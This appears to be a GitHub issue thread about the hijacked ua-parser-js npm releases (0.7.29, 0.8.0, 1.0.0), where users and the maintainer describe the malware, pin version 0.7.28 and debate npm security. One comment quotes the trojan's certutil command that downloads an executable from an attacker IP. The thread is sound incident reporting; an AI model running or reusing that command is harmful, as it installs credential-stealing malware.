Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) - Questions about deprecated npm package ua-parser-js #536

Open
SuperOleg39 opened this issue Oct 22, 2021 · 184 comments

Comments

@SuperOleg39
Copy link

@SuperOleg39 SuperOleg39 commented Oct 22, 2021

Hi!

See a warning at npm - https://www.npmjs.com/package/ua-parser-js - This package has been hijacked. Please revert to 0.7.28

First question - Can we use range ^0.7.28, or it is not safe?

Second question - Will you create a new package, or try to remove hijacked versions and continue update this package?

@nypinstripes
Copy link

@nypinstripes nypinstripes commented Oct 22, 2021

Ouch does that mean like there's malicious code in it or something?

@faisalman

Loading

@LyesIsogeo
Copy link

@LyesIsogeo LyesIsogeo commented Oct 22, 2021

I just update package and windows defender block "ceprolad.a" a trojan. I don't have any internet access at the same moment...
The trojan try to execute in the cmd: "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe". The certutil -rulcacha -f download a .exe file.

Loading

@SuperOleg39
Copy link
Author

@SuperOleg39 SuperOleg39 commented Oct 22, 2021

Update - ^0.7.28 range is dangerous, 0.7.29 version already published.

We all need to fix 0.7.28 in our dependencies.

Loading

@SuperOleg39
Copy link
Author

@SuperOleg39 SuperOleg39 commented Oct 22, 2021

@faisalman i hope you can revert versions with vulnerabilities?

Loading

@KalleOlaviNiemitalo
Copy link

@KalleOlaviNiemitalo KalleOlaviNiemitalo commented Oct 22, 2021

0.7.29 includes scripts that download and execute binaries. From the command-line arguments, one of them looks like a cryptominer, but that might be just for camouflage.

Loading

@alex-drocks
Copy link

@alex-drocks alex-drocks commented Oct 22, 2021

Revert back to 0.7.28 all greater version are infected. My computer was infected this morning when i updated my docusaurus version.
https://twitter.com/DrocksAlex/status/1451543176779534342

NPM official flag: https://www.npmjs.com/package/ua-parser-js

Loading

@Tom910
Copy link

@Tom910 Tom910 commented Oct 22, 2021

The best solution is to publish the 0.7.30 version without the vulnerability. Then ^ will jump to the vulnerable version

Loading

@faisalman
Copy link
Owner

@faisalman faisalman commented Oct 22, 2021

Hi all, very sorry about this.

I noticed something unusual when my email was suddenly flooded by spams from hundreds of websites (maybe so I don't realize something was up, luckily the effect is quite the contrary).

I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0

I have sent a message to NPM support since I can't seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish) so I can only deprecate them with a warning message.

Loading

@KalleOlaviNiemitalo
Copy link

@KalleOlaviNiemitalo KalleOlaviNiemitalo commented Oct 22, 2021

@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

Loading

@ohanedan
Copy link

@ohanedan ohanedan commented Oct 22, 2021

I think we should publish new versions above that this hijected versions.

Like:
0.7.30
0.8.1
1.0.1

Loading

@SuperOleg39
Copy link
Author

@SuperOleg39 SuperOleg39 commented Oct 22, 2021

I think we should publish new versions above that this hijected versions.

Like:
0.7.30
0.8.1
1.0.1

Little problem with that decision - it will be hard to remove this versions in a future.

So, ua-parser-js will need up version to 2.0.0, when want to push real updates

Loading

@benjilebon
Copy link

@benjilebon benjilebon commented Oct 22, 2021

Extra carefulness required because it seems to be affecting linux machines as well, make sure the miner doesn't get installed in your servers & ci stuff

For now it seems to only hang in installing because the url containing the infection doesn't seem to be working, but it may not last

Linux users can use this command to see if the miner is running or not and stop it : ps -aux | grep jsextension

Loading

@ohanedan
Copy link

@ohanedan ohanedan commented Oct 22, 2021

I think we should publish new versions above that this hijected versions.
Like:
0.7.30
0.8.1
1.0.1

Little problem with that decision - it will be hard to remove this versions in a future.

So, ua-parser-js will need up version to 2.0.0, when want to push real updates

That's right but it's a safest method I think. You can continue with version 2.0.0 and users don't specify a specific version will not be affected.

Loading

@faisalman
Copy link
Owner

@faisalman faisalman commented Oct 22, 2021

@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

Yes I've sent the report using that form, hope they can just be removed. Otherwise, I have to publish under new versions.

Loading

@aimozg
Copy link

@aimozg aimozg commented Oct 22, 2021

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

Loading

@alex-drocks
Copy link

@alex-drocks alex-drocks commented Oct 22, 2021

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

Does it? I'd have to change all my passwords.

Loading

@faisalman
Copy link
Owner

@faisalman faisalman commented Oct 22, 2021

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

You're right.. Ok then

Loading

@aimozg
Copy link

@aimozg aimozg commented Oct 22, 2021

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

Does it? I'd have to change all my passwords.

I've dropped the DLL it runs to a virustotal (before unplugging the ethernet): https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/behavior
It reads browser user data files and I've checked "files written" against my infected PC, it does look like a script to export OS credentials and a copy of cookies DB file from Chrome

Loading

@gaelhuot
Copy link

@gaelhuot gaelhuot commented Oct 22, 2021

We fixed it using this in our package.json :
"resolutions": { "**/ua-parser-js": "0.7.28" }

Loading

@faisalman
Copy link
Owner

@faisalman faisalman commented Oct 22, 2021

I think we should publish new versions above that this hijected versions.

Like: 0.7.30 0.8.1 1.0.1

Done. Thanks for the suggestion 👍

Loading

@Cphusion
Copy link

@Cphusion Cphusion commented Oct 22, 2021

a solution that we're using to address this vulnerability is to set the resolutions in pacakge.json to use the last good version:

...},"resolutions": { "ua-parser-js": "0.7.28" },...

That resolution will come in handy when using a library that depends on the latest of ua-parser-js as opposed to using ua-parser-js directly in your package.json dependencies.

Loading

@ljharb
Copy link

@ljharb ljharb commented Oct 27, 2021

There is no yarn registry - it’s just a proxy to the npm registry.

Loading

@alex-drocks
Copy link

@alex-drocks alex-drocks commented Oct 27, 2021

Everyone publishing to NPM should go to their account and activate 2-factor-authentication protection as others have already mentionned.
chrome_jUzcqOt3GD

Loading

@buennerbernd
Copy link

@buennerbernd buennerbernd commented Oct 28, 2021

Maybe I have overseen this. Could you please repeat the date when the package was compromised?

Thank you.

Loading

@DanielRuf
Copy link

@DanielRuf DanielRuf commented Oct 28, 2021

Loading

@kelset
Copy link

@kelset kelset commented Oct 28, 2021

While it's "a solved issue" at this point (as @ljharb points out), @faisalman I think that there are a couple things that you should do:

  1. publish a post-mortem.
  2. Edit the title and the first post of this issue to reflect the latest status (which versions were affected, which OS were affected, a couple scripts to check if you your machine is affected). Then pin the issue.
  3. Once 1 and 2 are done, close this issue.

If you need any help with the above, feel free to reach out, my contacts are in my GH profile page.

Loading

@nypinstripes
Copy link

@nypinstripes nypinstripes commented Nov 5, 2021

@faisalman without reading through all the 400 comments here, can you tell us is v1.0.2 safe to use?

Loading

@ccravens
Copy link

@ccravens ccravens commented Nov 5, 2021

Hello all, I've created a petition to get NPM's attention to prevent this from happening, please sign and share this petition to show NPM we demand better security procedures on released packages!

https://www.change.org/p/npm-please-secure-package-releasing

Loading

@JanithaR
Copy link

@JanithaR JanithaR commented Nov 5, 2021

Hello all, I've created a petition to get NPM's attention to prevent this from happening, please sign and share this petition to show NPM we demand better security procedures on released packages!

https://www.change.org/p/npm-please-secure-package-releasing

2-factor authentication is already there. Probably @faisalman didn't have that set up before the incident. I don't see the need for a petition.

Loading

@alex-drocks
Copy link

@alex-drocks alex-drocks commented Nov 5, 2021

Hello all, I've created a petition to get NPM's attention to prevent this from happening, please sign and share this petition to show NPM we demand better security procedures on released packages!
https://www.change.org/p/npm-please-secure-package-releasing

2-factor authentication is already there. Probably @faisalman didn't have that set up before the incident. I don't see the need for a petition.

Signed

Loading

@alex-drocks
Copy link

@alex-drocks alex-drocks commented Nov 5, 2021

Hello all, I've created a petition to get NPM's attention to prevent this from happening, please sign and share this petition to show NPM we demand better security procedures on released packages!

https://www.change.org/p/npm-please-secure-package-releasing

Yes, it needs to be enforced. I had to rebuild my whole windows computer from scratch and change major passwords because of this. It was a long week.

Loading

@PrivateGER
Copy link

@PrivateGER PrivateGER commented Nov 5, 2021

Would you people please stop cluttering this already gigantic thread with garbage like a change.org petition? This is software development, stop creating petitions and raise an issue over at npm instead.

Loading

@sharedrory
Copy link

@sharedrory sharedrory commented Nov 5, 2021

Hello all, I've created a petition to get NPM's attention to prevent this from happening, please sign and share this petition to show NPM we demand better security procedures on released packages!

https://www.change.org/p/npm-please-secure-package-releasing

Sorry to post this here but

Automatically scan packages for vulnerabilities before being released to the general public

This would only be able to catch whatever is already known.

Part of the real problem is that you can't even see the source code of npm packages without downloading them. If npm made normal users and not just teams have access to the files tab then that would be a great step towards a secure future.
Furthermore, display not the whole package.json, not the entire scripts sections, but even just the scripts that npm runs on the package lifecycle events such as install on the package page would help. This all belongs somewhere where npm will see it and not here but I just wanted to say that this is one of the only ways we can solve the problem.

Loading

@ljharb
Copy link

@ljharb ljharb commented Nov 5, 2021

@sharedrory yes, you can. https://unpkg.com/ua-parser-js, and npm itself when logged in has an "explore" tab.

Loading

@mensfeld
Copy link

@mensfeld mensfeld commented Nov 5, 2021

@sharedrory for code changes you can use mentioned before diffend platform: https://my.diffend.io/npm/ua-parser-js/0.7.28/0.7.29

Loading

@sharedrory
Copy link

@sharedrory sharedrory commented Nov 5, 2021

@sharedrory yes, you can. https://unpkg.com/ua-parser-js, and npm itself when logged in has an "explore" tab.

That is not npm. Why should you have to be logged in. Even then its useless as most packages are "too big" to be displayed.

@sharedrory for code changes you can use mentioned before diffend platform: https://my.diffend.io/npm/ua-parser-js/0.7.28/0.7.29

That is not npm.

Loading

@krishnaUIDev
Copy link

@krishnaUIDev krishnaUIDev commented Nov 18, 2021

@ccravens i think you can make petition to npm that they have to scan this kind of Malwares while publishing to the library. 

Loading

@gugu
Copy link

@gugu gugu commented Nov 18, 2021

@krishnaUIDev do you solve every problem with a petition?

Loading

@krishnaUIDev
Copy link

@krishnaUIDev krishnaUIDev commented Nov 18, 2021

@krishnaUIDev do you solve every problem with a petition?

I think this the one way.

Loading

@ljharb
Copy link

@ljharb ljharb commented Nov 18, 2021

npm - like almost everything else - doesn’t make decisions by petition.

Loading

@KalleOlaviNiemitalo
Copy link

@KalleOlaviNiemitalo KalleOlaviNiemitalo commented Nov 18, 2021

According to GitHub's commitment to npm ecosystem security in the GitHub blog, the NPM team is already working on automated malware detection. NPM will also start requiring two-factor authentication "for maintainers and admins of popular packages" next year.

Loading

@PrivateGER
Copy link

@PrivateGER PrivateGER commented Nov 19, 2021

@krishnaUIDev do you solve every problem with a petition?

I think this the one way.

No, the one way is the issue tracker over at npm/rfcs. Literally no software project makes decision by petition. They don't allow discussion, they don't allow modification, they are useless for this case.

Loading

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

None yet